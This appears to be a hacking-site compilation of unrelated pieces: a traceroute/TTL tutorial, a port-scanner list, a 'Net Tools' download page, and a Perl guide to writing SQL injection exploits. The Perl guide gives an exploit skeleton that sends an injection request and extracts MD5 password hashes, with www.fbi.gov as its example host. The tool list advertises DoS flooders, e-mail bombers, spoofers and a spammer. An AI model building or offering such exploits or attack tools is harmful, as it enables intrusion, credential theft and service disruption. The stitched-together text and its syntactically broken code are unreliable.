Introduction

Imagine a world without tracert/traceroute. You would be sending your precious packets out into the big wide world with no idea where they go and what they might meet when they are out there. When you set up routers with complex route statements you wouldn’t really know if everything you want is travelling the path you intend it to. When that pesky machine across the internet is "hammering" away at your mail server and you’d really like to know where it is you would be "blind". Enter traceroute, the network administrator’s personal "tracker".
Traceroute was originally conceived as a hack by Van Jacobson in about 1988. He needed to find a way to delineate the path his packets were taking through a routed network to troubleshoot some problems. There were no tools available to do this and there was no clear and easy answer. With knowledge of how the network works Van created traceroute. The solution is elegant in it’s pure simplicity. It’s all in the TTL…..
NOTE: My definition of a "hack" has always been that it is the use of the knowledge regarding how a system works to obtain results that the system was not intended to provide. As such I have always been extremely impressed by the pure simplicity of traceroute as a perfect example of a true "hack" of a system. It’s a little thing of beauty.

What’s a TTL?

The TTL, or Time To Live, is a field in the structure of an Internet Protocol, (IP), packet. Without a TTL a misrouted or mis-addressed packet sent out onto a network would forever travel cyberspace using up bandwidth for no good reason. The TTL is placed in the packets so that each router can check it and act accordingly. If a router that is not the destination of a packet receives one that has a TTL of 1 or 0 it must drop the packet, (not forward it onwards), and send an Internet Control Message Protocol, (ICMP), Time_Exceeded, (Type 11), packet to the originating IP address informing it that, to all intents and purposes, the destination IP address is "too far away" to be contacted. If a packet is received by a router that is not the destination of the packet then the router must decrement the TTL by one and forward the packet on to the next router, (or the destination IP address if that is the next "hop"). In this way control is maintained over messed up addresses or routes and the packets cannot wander forever.
Van’s Hack.
Knowing that the TTL is there for a reason and that a given response must occur if the number of hops required to reach the destination exceeds the TTL in the packet Van saw that this could be utilized to determine each router the packet passed through on it’s way to the destination address. This can be demonstrated manually and you can try this as you go if you like. Open a command/DOS prompt and type:-
ping yahoo.com <ENTER>

The response will be:-

Pinging yahoo.com [66.218.71.114] with 32 bytes of data:
Reply from 216.109.127.30: bytes=32 time=40ms TTL=49
Reply from 216.109.127.30: bytes=32 time=40ms TTL=49
Reply from 216.109.127.30: bytes=32 time=40ms TTL=49
Reply from 216.109.127.30: bytes=32 time=50ms TTL=49

Good, Yahoo is up…. But we have no idea how the packet got there. We can see that 32 bytes were sent, that it took an average of 42 milliseconds to get there and there’s that TTL thing set at 49. Knowing that most systems set the TTL at certain set points I can make a guess that the original TTL was 64 and, based on that assumption, I can guess that Yahoo is some 16 hops away from me…… But where? Try this:-
Ping -i 1 yahoo.com <ENTER>

The -i switch allows you to set the TTL in the packet to anything you please between 1 and 255. Knowing that, we know that the first router should drop the packet if we set the TTL to 1 and send and ICMP Type 11 packet in return, (Time_Exceeded).
The response will be:-
Pinging yahoo.com [66.218.71.114] with 32 bytes of data:
Reply from 207.XXX.XXX.1: TTL expired in transit.
Reply from 207.XXX.XXX.1: TTL expired in transit.
Reply from 207.XXX.XXX.1: TTL expired in transit.
Reply from 207.XXX.XXX.1: TTL expired in transit.
Well…. That’s the first router in the chain, (it’s actually my firewall. Your result will differ but it will be the first hop on the route to Yahoo from your computer). If we now set the TTL to 2 then the next router will send our Time_Exceeded packet back to us. Try:-
ping -i 2 yahoo.com <ENTER>
The response is:-
Pinging yahoo.com [66.218.71.114] with 32 bytes of data:
Reply from 207.XXX.XXX.17: TTL expired in transit.
Reply from 207.XXX.XXX.17: TTL expired in transit.
Reply from 207.XXX.XXX.17: TTL expired in transit.
Reply from 207.XXX.XXX.17: TTL expired in transit.
Nice… Thats my border router. Now I have two steps in the route. As long as I keep incrementing the TTL in the -i switch of the ping command I can manually tracert as far along the route to Yahoo as I get the Time_Exceeded responses from the routers. When you hit a firewall that will not respond to ping requests you will receive a "Request timed out" message. Usually this is the point you would give up, but it’s worth going another step or two because sometimes the firewall is set to not respond to pings themselves and not to allow them to the first internal router but they may allow them to the specific host you are trying to contact so it is worth going the extra mile.
Am I restricted to ICMP Pings?
Not at all. Just because your target has a firewall in place that stops pings doesn’t mean you can’t enumerate internal devices on the target network. Let’s say it’s a web server and the end of the traceroute looks like this:- (NOTE: It doesn’t for Yahoo and at this point do not continue to experiment with Yahoo or any other domain you don’t have rights or permission to do this against.)
14 70 ms 70 ms 80 ms unknown.level3.net [64.152.69.30]
15 70 ms 70 ms 80 ms unknown-66-218-82-226.yahoo.com [66.218.82.226]
16 * * * Request timed out.
17 * * * Request timed out.
18 70 ms 70 ms 80 ms www.yahoo.com [66.218.71.114]
We know that www.yahoo.com accepts HTTP requests on port 80 so we know that the firewall will let them in and we are really curious to see what those two "Request timed out" devices are. So you can fire up your favorite packet crafter, make up a packet that is a simple SYN request on port 80 to www.yahoo.com and set the TTL to 16 and send it out. With your trusty packet sniffer running you will receive the Time_Expired on your HTTP SYN packet. With some research as to the make-up of that packet you might be able to determine the operating system of the device, (Cisco IOS etc.). This works because even though HTTP is a TCP protocol the packets themselves are "wrapped" in the Internet Protocol, (IP), containing the TTL information and the required response to a packet that has "run out of hops" is the ICMP Time_Exceeded.
Conclusion
As you can see a very simple and innocuous looking part of a packet that has a simple function has been "subverted" into being a more powerful tool than it was ever intended. Today, every network administrator uses traceroute/tracert daily and most have no idea they are using a "hacking tool". Others have taken Van’s original concept and improved upon it and found other ways to "exploit" the principle quite successfully but in my opinion his "hack" is still the most elegant.

[1] Introduction
[2] Little panning of Perl language used into an internet context
[3] Perl SQL Injection by examples
[4] Gr33tz to …

—+— StArT

[1] Introduction

Perl can be considered a very powerfull programming language in we think to the internet context. Infact we can make a lot
of operation across the internet just writing a litlle bit of code. So i decided to write a similar guide to make an
easiest life to everyone who decide to start writing a perl exploit.
There are few requisites u need to proceed:
- U must know the basics operation of perl (print, chomp, while, die, if, etc etc…);
- U must know what kind of SQL code u need to inject to obtain a specific thing (stealing pwd, add new admin, etc etc…).

Now, we are ready to start…

[2] Little panning of Perl language used into an internet context

Using a Perl code into an internet context means that u should be able to make a sort of dialog between your script and the
server side (or other..). To make this u need to use some “Perl modules”.
Those modules must be put on the head of the script. In this tut we are going to use only the “IO::Socket” module, but
there are thousand and if u are curious just search on cpan to retrieve info on every module.

[-] Using the IO::Socket module
Using this module is quite simple. To make the Perl Interpreter able to use this module u must write on the starting
of the script “use IO::Socket”. With this module u’ll be able to connect to every server defined previously, using
a chomp, look at the example.

Example:
print “Insert the host to connect: “;
chomp ($host=<STDIN>);

Now suppose that the host inserted is www.host.com. We must declare to the interpreter that we want to connect to this
host. To do this, we must create a new sock that will be used by the interpreter to connect.
To create this we are going to write something like this:

$sock = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$host”, PeerPort=>”80″)
or die ” ]+[ Connecting ... Can't connect to host.nn";

In this piece of code we have declared that the interpreter must use the "IO::Socket" module, creating a new
connection, through the TCP protocol, using the port 80 and direct to the host specified in the chomp
($host=www.fbi.gov).
If connection is not possible an error message will appear ("Connecting ... Can't connect to host").
Resume:
- Proto=>TCP -------> The protocol to use (TCP/UDP)
- PeerAddr=> -------> The server/host to connect
- PeerPort=> -------> Port to use for the connection

Ok, now let's go to the next step, which is the real hearth of this tut.

[3] Perl SQL Injection

Assuming that we know what kind of SQL statement must inject, now we are going to see how to do this.

The SQL code must be treaty like a normal variable (like “$injection”).

Example:
$injection=index.php/forum?=[SQL_CODE]

This string means that we are going to inject the query into “index.php/forum” path, following the correct syntax that
will bring us to cause a SQL Injection “?=”.

Now we must create a piece of code that will go to inject this query into the host vuln.

print $sock “GET $injection HTTP/1.1n”;
print $sock “Accept: */*n”;
print $sock “User-Agent: Hackern”;
print $sock “Host: $hostn”;
print $sock “Connection: closenn”;

This piece of code is the most important one into the building of an exploit.
It can be considered the “validation” of the connection.
In this case the “print” command doesn’t show anything on screen, but it creates a dialogue and sends commands to the host.

In the first line the script will send a “GET” to the selected page defined into “$injection”.
In the third line it tells to the host “who/what” is making the request of “GET”. In this case this is Hacker, but it
can be “Mozilla/5.0 Firefox/1.0.4″ or other.
In the fourth line it defines the host to connect to, “$host”.

With the execution of this script we have made our injection.

Resume of the exploit:

use IO::Socket

print “Insert the host to connect: “;
chomp ($host=<STDIN>);

$sock = IO::Socket::INET->new(Proto=>”tcp”, PeerAddr=>”$host”, PeerPort=>”80″)
or die ” ]+[ Connecting ... Can't connect to host.nn";

$injection=index.php/forum?=[SQL_CODE]

print $sock “GET $injection HTTP/1.1n”;
print $sock “Accept: */*n”;
print $sock “User-Agent: Hackern”;
print $sock “Host: $hostn”;
print $sock “Connection: closenn”;
close ($sock); #this line terminates the connection

A little trick:

Assuming that, with the execution of SQL Inj, u want to retrieve a MD5 Hash PWD, u must be able to recognize it.
Additionally, u want that your script will show the PWD on your screen.
Well, to make this, the next piece of code, could be one of the possible solutions.

while($answer = <$sock>) {
if ($answer =~ /([0-9a-f]{32})/) {
print “]+[ Found! The hash is: $1n”;
exit(); }

This string means that if the answer of the host will show a “word” made by 32 characters (”0″ to “9″ and “a” to “f”),
this word must be considered the MD5 Hash PWD and it must be showed on screen.

Conclusions:
The method showed in this tut is only one of the 10000 existing, but, for me, this is the most complete one.
U could use also the module “LWP::Simple” in the place of “IO::Socket”, but u should change something into the code.
This method can be used also, not only for SQL Injection, but, for example, remote file upload or other.

Port Scanner :

A port scanner is a piece of software designed to search a network host for open ports. This is often used by administrators to check the security of their networks and by crackers to compromise it. To portscan a host is to scan for listening ports on a single target host.

1. Nmap
2. Superscan
3. Angry Ip Scanner

1. Nmap

Nmap (”Network Mapper”) is a free and open source utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and both console and graphical versions are available.

www.nmap.org

2. Superscan :

SuperScan is a powerful freeware TCP port scanner, that includes a variety of additional networking tools like ping, traceroute, HTTP HEAD, WHOIS and more. It uses multi-threaded and asynchronous techniques resulting in extremely fast and versatile scanning. You can perform ping scans and port scans using any IP range or specify a text file to extract addresses from. Other features include TCP SYN scanning, UDP scanning, HTML reports, built-in port description database, Windows host enumeration, banner grabbing and more.

www.foundstone.com/us/resources/proddesc/superscan.htm

3. Angry Ip Scanner :

Angry IP Scanner (or simply ipscan) is an open-source and cross-platform network scanner designed to be fast and simple to use. It scans IP addresses and ports as well as has many other features.

It is widely used by network administrators and just curious users around the world, including large and small enterprises, banks, and government agencies.

It runs on Linux, Windows, and Mac OS X, possibly supporting other platforms as well.

www.angryziber.com/w/Home

What is Net Tools :

Net Tools is a comprehensive set of host monitoring, network scanning, security, administration tools and much more, all with a highly intuitive user interface. It’s an ideal tool for those who work in the network security, administration, training, internet forensics or law enforcement internet crimes fields. Net Tools is mainly written in Microsoft Visual Basic 6, Visual C++, Visual C# and Visual Studio .NET.

Screenshots

Here are a few screenshots of Net Tools 5. Click to enlarge.

Download Net Tools 5.0

[ download ] (version 5.0.70)

Features:

Net Tools 5.0 (build 70) contains a whole variety of network tools. Here is a list of the most important tools:

1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8 ) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online – Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect – Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer’s IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, … All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)

Many extra features and utilities are included in this package!

Download Net Tools 5.0

[ download ] (version 5.0.70)